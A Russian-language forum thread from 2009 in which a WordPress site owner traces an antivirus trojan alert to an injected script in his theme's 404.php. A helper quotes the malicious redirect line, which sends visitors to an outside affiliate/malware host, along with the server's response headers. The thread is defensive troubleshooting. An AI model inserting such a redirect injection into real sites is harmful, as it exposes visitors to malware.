Поймал вот такое на сайте
25.11.2009 9:10:38 SYSTEM 1452 Sign of "JS:ScriptIP-inf [Trj]" has been found in "http://saminsky.ru/archives/613/print/\{gzip}" file.
25.11.2009 9:10:59 SYSTEM 1452 Sign of "JS:ScriptIP-inf [Trj]" has been found in "http://saminsky.ru/favicon.ico\{gzip}" file.
Личный компьютер проверил, все чисто.
На сайте глазами проверил Index.php, глазами просмотрел все файлы темы, ничего подозрительного не видно.
По какому тексту или куску текста искать заразу? Где она может спрятаться?
Еще как видно!
HTTP/1.1 404 Not Found
Date: Wed, 25 Nov 2009 08:41:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://saminsky.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=7768cb0f61311eecabaf7b63e34d906e; path=/
Last-Modified: Wed, 25 Nov 2009 08:41:18 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
<script>location=’http://chilisoft.in/hitin.php?affid=02934′;</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
……
Спасибо, ща запущу поиск,
КАК И ЧЕМ Вы это увидели?
В хедере темы перед !DOCTYPE html PUBLIC … ничего нет,
ничего не т в файле index темы…
ничего не т в файле index блога…
интересно… куда запрятано…
Отклучил WP-PRINT – по тексту ctrl-U такой строчки не видно.
А у вас?
Чудеса продолжаются:
на сайте была папка simages, в ней лежали некоторые картинки, теперь ее не видно, при попытке к ней обратиться вылетает вирус.
при просмотре .htaccess ничего постороннего не видно
Создал директорию, при обращении по адресу:http://saminsky.ru/simages/ вирус не обнаруживается, а вот при картинке
http://saminsky.ru/simages/pic2.gif т.е к несуществующей картинке тут же вылетает троян,
Загрузил в папку картинки, обнаружение вируса прекратилось, т.е. механизм состоит в том, что при утере файла картинки происходит редирект на вирусный сайт.
Интересно, в каком месте спрятана обработка ненайденного файла…. Где искать…
Файл header.php смотрите и смените пароль на FTP.
Нашел в странице 404.php темы….
Остается понять, как туда попал мерзавец.
FTP пароль я сменил, доступ к папкам стоял правильно
У меня есть специальный инструмент 🙂 Вообще-то он был сделан для обнаружения горячо любимого BOM и глупостей в http-заголовках. Но и для обнаружения вирусяки, как выяснилось, сгодился.
Всеравно спасибо за помощь :)))